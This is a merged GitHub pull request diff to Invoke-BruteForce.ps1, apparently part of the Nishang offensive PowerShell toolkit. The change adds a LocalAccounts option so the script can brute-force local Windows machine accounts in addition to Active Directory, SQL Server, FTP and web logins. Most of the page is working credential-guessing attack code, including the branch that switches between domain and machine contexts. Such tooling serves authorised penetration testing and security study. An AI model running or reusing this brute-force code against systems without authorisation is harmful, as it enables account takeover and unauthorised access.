Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added LocalAccounts option to brute force local accounts (non AD) #66

Merged
merged 1 commit into from
Nov 12, 2018
Merged

Added LocalAccounts option to brute force local accounts (non AD) #66

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
24 changes: 16 additions & 8 deletions Scan/Invoke-BruteForce.ps1
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -3,13 +3,13 @@ function Invoke-BruteForce
{
<#
.SYNOPSIS
Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP.
Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Local Accounts, Web and FTP.

.DESCRIPTION
This payload can brute force credentials for SQL Server, ActiveDirectory, Web or FTP.
This payload can brute force credentials for SQL Server, ActiveDirectory, LocalAccounts, Web or FTP.

.PARAMETER Computername
Specifies a SQL Server, Domain, FTP Site or Web Site.
Specifies a SQL Server, Domain, Computer, FTP Site or Web Site.

.PARAMETER UserList
Specify a list of users. If blank, trusted connection will be used for SQL and an error will be genrated for other services.
Expand All @@ -18,7 +18,7 @@ Specify a list of users. If blank, trusted connection will be used for SQL and a
Specify a list of passwords.

.PARAMETER Service
Enter a Service from SQL, ActiveDirecotry, FTP and Web. Default service is set to SQL.
Enter a Service from SQL, ActiveDirecotry, LocalAccounts, FTP and Web. Default service is set to SQL.

.PARAMETER StopOnSuccess
Use this switch to stop the brute forcing on the first success.
Expand Down Expand Up @@ -66,7 +66,7 @@ Goude 2012, TreuSec
[String]
$PasswordList,

[Parameter(Position = 3, Mandatory = $true)] [ValidateSet("SQL","FTP","ActiveDirectory","Web")]
[Parameter(Position = 3, Mandatory = $true)] [ValidateSet("SQL","FTP","ActiveDirectory","LocalAccounts","Web")]
[String]
$Service = "SQL",

Expand Down Expand Up @@ -214,11 +214,19 @@ Goude 2012, TreuSec
}

#Brute Force Active Directory
elseif ($service -eq "ActiveDirectory")
elseif ($service -eq "ActiveDirectory" -or $service -eq "LocalAccounts")
{
Write-Output "Brute Forcing Active Directory $ComputerName"
if ($service -eq "ActiveDirectory")
{
Write-Output "Brute Forcing Active Directory $ComputerName"
$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain
}
else
{
Write-Output "Brute Forcing Local Accounts $ComputerName"
$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Machine
}
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain
Try
{
$principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, $ComputerName)
Expand Down